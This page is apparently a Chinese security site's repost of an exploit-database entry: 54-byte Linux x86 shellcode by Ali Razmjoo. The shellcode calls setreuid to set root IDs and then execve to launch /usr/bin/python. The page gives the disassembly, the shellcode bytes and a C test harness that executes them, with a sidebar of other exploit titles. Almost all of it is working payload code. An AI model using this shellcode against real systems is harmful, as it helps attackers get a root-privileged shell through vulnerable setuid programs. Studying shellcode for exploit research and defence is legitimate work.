linux/x86 Run /usr/bin/python setreuid(),execve()

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

linux/x86 Run /usr/bin/python setreuid(),execve() - 54 Bytes

来源：Ali.Razmjoo1994@Gmail.Com 作者：Razmjoo 发布时间：2014-08-11

Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com

Shellcode Linux x86 Run /usr/bin/python | setreuid(),execve()

Shellcode Length: 54

00000000 <_start>:

0: 31 c0 xor %eax,%eax

2: b0 46 mov $0x46,%al

4: 31 db xor %ebx,%ebx

6: 31 c9 xor %ecx,%ecx

8: cd 80 int $0x80

a: eb 16 jmp 22 <last>

0000000c <first>:

c: 5b pop %ebx

d: 31 c0 xor %eax,%eax

f: 88 43 0f mov %al,0xf(%ebx)

12: 89 5b 10 mov %ebx,0x10(%ebx)

15: 89 43 14 mov %eax,0x14(%ebx)

18: b0 0b mov $0xb,%al

1a: 8d 4b 10 lea 0x10(%ebx),%ecx

1d: 8d 53 14 lea 0x14(%ebx),%edx

20: cd 80 int $0x80

00000022 <last>:

22: e8 e5 ff ff ff call c <first>

27: 2f das

28: 75 73 jne 9d <last+0x7b>

2a: 72 2f jb 5b <last+0x39>

2c: 62 69 6e bound %ebp,0x6e(%ecx)

2f: 2f das

30: 70 79 jo ab <last+0x89>

32: 74 68 je 9c <last+0x7a>

34: 6f outsl %ds:(%esi),(%dx)

35: 6e outsb %ds:(%esi),(%dx)

*/

#include <stdio.h>

#include <string.h>

char sc[] =

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e"

;

int main(void)

{

fprintf(stdout,"Length: %d\n\n",strlen(sc));

(*(void(*)()) sc)();

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告